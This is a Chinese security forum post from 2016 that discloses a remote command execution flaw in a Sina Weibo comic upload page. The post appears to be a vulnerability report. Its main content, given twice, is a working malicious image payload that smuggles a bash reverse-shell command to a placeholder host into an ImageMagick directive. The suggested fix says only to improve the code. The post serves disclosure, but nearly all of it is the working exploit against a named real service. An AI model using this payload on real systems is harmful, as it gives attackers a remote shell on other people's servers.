HanDs
NO.2

[7月漏洞公开] 新浪微博某处远程命令执行漏洞(可反弹shell操作服务器) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT

详细说明:

code 区域
来到这里http://manhua.weibo.com/space/upload_comic



code 区域
上传poc
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"
pop graphic-context



123.png



code 区域
反弹一波



22.png

漏洞证明:

code 区域
来到这里http://manhua.weibo.com/space/upload_comic



code 区域
上传poc
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"
pop graphic-context



123.png



code 区域
反弹一波



22.png

修复方案:

完善代码


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 某处 远程 命令 执行 漏洞
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组